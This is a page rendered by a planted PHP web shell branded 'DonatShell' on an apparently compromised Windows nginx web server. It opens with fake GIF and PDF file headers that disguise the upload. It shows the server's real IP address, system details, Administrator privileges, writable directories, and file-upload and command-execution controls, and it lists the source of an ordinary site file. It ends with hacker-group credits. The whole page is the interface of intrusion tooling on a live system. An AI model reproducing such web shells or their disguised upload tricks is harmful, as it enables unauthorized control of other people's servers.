GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/common/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/common/unauthorized.phpinc
<?
// common/unauthorized.phpinc

debugTrackBegin();
if (isset($_SESSION['userFullName']) && $_SESSION['userFullName'] != '') {
} else {
}
if ( isset($pageTitle) ) { $pageName = 'the "'.$pageTitle.'"'; } else { $pageName = 'this'; }
$headTitle = '_CST_ - User Not Authorized';
$pageTitle = '_CST_<br>User Not Authorized';
$css = "printing";
require('common/pageHeader.phpinc');
?>
<p>
<div class="centered">
<span class="bold error">
<?
if ( isset($_SESSION['userFullName']) && $_SESSION['userFullName'] != '' ) {
?>
  <?=$_SESSION['userFullName']?> is not authorized to view <?=$pageName?> page.
<?
} else {
?>
  Guest is not authorized to view <?=$pageName?> page.
<?
}
?>
</span>
<br>
<br>
If you feel this is an error, please contact the <span class="appName"><?=$_SESSION['NAME_SHORT']?></span> web site Administrator <a href="mailto:<?=$_SESSION['websiteAdministratorEmail']?>"><?=$_SESSION['websiteAdministratorName']?></a> at <?=$_SESSION['websiteAdministratorEmail']?>.
<p>
</div>
<?
if ( !isset($_SESSION['userFullName']) || $_SESSION['userFullName'] == '' ) {
  require("Login/login.phpinc");
}
debugTrackEnd();
require('common/pageFooter.phpinc');
?>

Anon7 - 2022
AnonSec Team